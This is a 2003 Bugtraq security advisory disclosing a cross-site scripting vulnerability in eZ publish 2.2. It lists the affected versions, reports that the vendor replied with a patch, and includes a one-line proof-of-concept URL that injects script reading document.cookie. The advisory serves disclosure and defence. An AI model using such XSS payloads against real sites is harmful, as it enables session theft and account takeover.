Bugtraq mailing list archives
EzPublish Directory XSS Vulnerability
From: "Ferruh Mavituna" <ferruh () mavituna com>
Date: Fri, 16 May 2003 06:22:20 +0300
------------------------------------------------------ EzPublish "Directory" XSS Vulnerability ------------------------------------------------------ ------------------------------------------------------ About Ezpublish; ------------------------------------------------------ PHP Based Content Management System Vendor : http://ez.no Demo : http://publishdemo.ez.no/ ------------------------------------------------------ Vulnerable; ------------------------------------------------------ eZ publish 2.2 ------------------------------------------------------ Not Vulnerable; ------------------------------------------------------ eZ publish 3 ------------------------------------------------------ Vendor Status; ------------------------------------------------------ Vendor replied and send a new version of this file. (attached) ------------------------------------------------------ Patch; ------------------------------------------------------ You can download patched file in attachment. ------------------------------------------------------ Exploit; ------------------------------------------------------ http://[victim]/index.php/article/articleview/[img%20src="javascript:alert(document.cookie)"] (Replace [], <>) Ferruh Mavituna Web Application Security Consultant Freelance Developer & Designer http://ferruh.mavituna.com ferruh () mavituna com
Attachment:
articleview.php
Description:
Current thread:
- EzPublish Directory XSS Vulnerability Ferruh Mavituna (May 16)